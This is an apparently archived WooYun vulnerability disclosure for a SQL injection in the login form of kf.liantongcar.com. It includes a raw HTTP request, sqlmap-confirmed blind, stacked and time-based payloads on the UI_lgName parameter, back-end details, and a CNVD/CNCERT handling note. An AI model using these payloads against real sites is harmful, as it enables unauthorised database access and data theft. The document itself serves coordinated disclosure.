乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-02: 细节已通知厂商并且等待厂商处理中 2015-07-06: 厂商已经确认,细节仅向厂商公开 2015-07-16: 细节向核心白帽子及相关领域专家公开 2015-07-26: 细节向普通白帽子公开 2015-08-05: 细节向实习白帽子公开 2015-08-20: 细节向公众公开
注入:POST / HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://kf.liantongcar.com/Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: kf.liantongcar.comContent-Length: 450Proxy-Connection: Keep-AlivePragma: no-cacheCookie: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTYyNDM5NTg2Mg8WAh4EVk51bQUFNjI4RjgWAgIBD2QWAgIZDw8WAh4EVGV4dAUDMTMzZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWltYWdlc19vawUMaW1hZ2VzX2NocHdkheQPzCpta9GaKmVPJRe0EXDTYylOXU10IGVFSlQgCrY%3D&__EVENTVALIDATION=%2FwEWBgLmmqvuCwLDv5LZCAK5v%2BKZCgK8orKkCAK0wuPRBQKJ3benDJAh4qNdl%2BHnPOSJKPkNucCyKnsvLQ0nC81XpbUc6YRF&UI_lgName=kf&UI_lgPass=123&images_ok.x=33&images_ok.y=11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: UI_lgName (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTYyNDM5NTg2Mg8WAh4EVk51bWUWAgIBD2QWAgIZDw8WAh4EVGV4dAUDMTMzZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWltYWdlc19vawUMaW1hZ2VzX2NocHdkEOO/dW/auq/ZT7lsP8tZkxMHqcP1Bu9v7k/SpG6+8xc=&__EVENTVALIDATION=/wEWBgKY8pnIBgLDv5LZCAK5v+KZCgK8orKkCAK0wuPRBQKJ3benDAWjv4GWadK3PySdE8XiZ9XZkfOcJ1GVa+IBbL3DQCkQ&UI_lgName=kf';IF(2038=2038) SELECT 2038 ELSE DROP FUNCTION vLsk--&UI_lgPass=123&images_ok.x=33&images_ok.y=11 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTYyNDM5NTg2Mg8WAh4EVk51bWUWAgIBD2QWAgIZDw8WAh4EVGV4dAUDMTMzZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWltYWdlc19vawUMaW1hZ2VzX2NocHdkEOO/dW/auq/ZT7lsP8tZkxMHqcP1Bu9v7k/SpG6+8xc=&__EVENTVALIDATION=/wEWBgKY8pnIBgLDv5LZCAK5v+KZCgK8orKkCAK0wuPRBQKJ3benDAWjv4GWadK3PySdE8XiZ9XZkfOcJ1GVa+IBbL3DQCkQ&UI_lgName=kf';WAITFOR DELAY '0:0:5'--&UI_lgPass=123&images_ok.x=33&images_ok.y=11 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTYyNDM5NTg2Mg8WAh4EVk51bWUWAgIBD2QWAgIZDw8WAh4EVGV4dAUDMTMzZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWltYWdlc19vawUMaW1hZ2VzX2NocHdkEOO/dW/auq/ZT7lsP8tZkxMHqcP1Bu9v7k/SpG6+8xc=&__EVENTVALIDATION=/wEWBgKY8pnIBgLDv5LZCAK5v+KZCgK8orKkCAK0wuPRBQKJ3benDAWjv4GWadK3PySdE8XiZ9XZkfOcJ1GVa+IBbL3DQCkQ&UI_lgName=kf' WAITFOR DELAY '0:0:5'--&UI_lgPass=123&images_ok.x=33&images_ok.y=11---web server operating system: Windowsweb application technology: ASP.NET, ASP.NET 0back-end DBMS: Microsoft SQL Server 2008current database: 'CarMember'
过滤
危害等级:中
漏洞Rank:9
确认时间:2015-07-06 18:34
CNVD确认所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.
暂无
